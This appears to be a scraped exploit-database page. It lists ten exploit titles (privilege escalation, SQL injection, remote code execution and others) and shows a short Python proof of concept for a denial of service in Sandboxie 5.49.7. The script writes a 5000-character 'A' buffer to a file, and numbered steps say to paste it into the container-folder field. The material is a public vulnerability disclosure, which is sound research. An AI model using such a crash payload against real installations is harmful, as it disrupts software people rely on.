
10 changes to exploits/shellcodes Sandboxie 5.49.7 - Denial of Service (PoC) Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path Epic Games Rocket League 1.95 - Stack Buffer Overrun Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated) Voting System 1.0 - Authentication Bypass (SQLI) Voting System 1.0 - Remote Code Execution (Unauthenticated) Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated) PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: May 3rd 2021
18 lines
No EOL
592 B
Python
Executable file
18 lines
No EOL
592 B
Python
Executable file
# Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC)
|
|
# Date: 06/05/2021
|
|
# Author: Erick Galindo
|
|
# Vendor Homepage: https://sandboxie-plus.com/
|
|
# Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe
|
|
# Version: 5.49.7
|
|
# Tested on: Windows 10 Pro x64 es
|
|
|
|
# Proof of Concept:
|
|
#1.- Copy printed "AAAAA..." string to clipboard!
|
|
#2.- Sandboxie Control->Sandbox->Set Container Folder
|
|
#3.- Paste the buffer in the input then press ok
|
|
|
|
buffer = "\x41" * 5000
|
|
|
|
f = open ("Sandboxie10.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |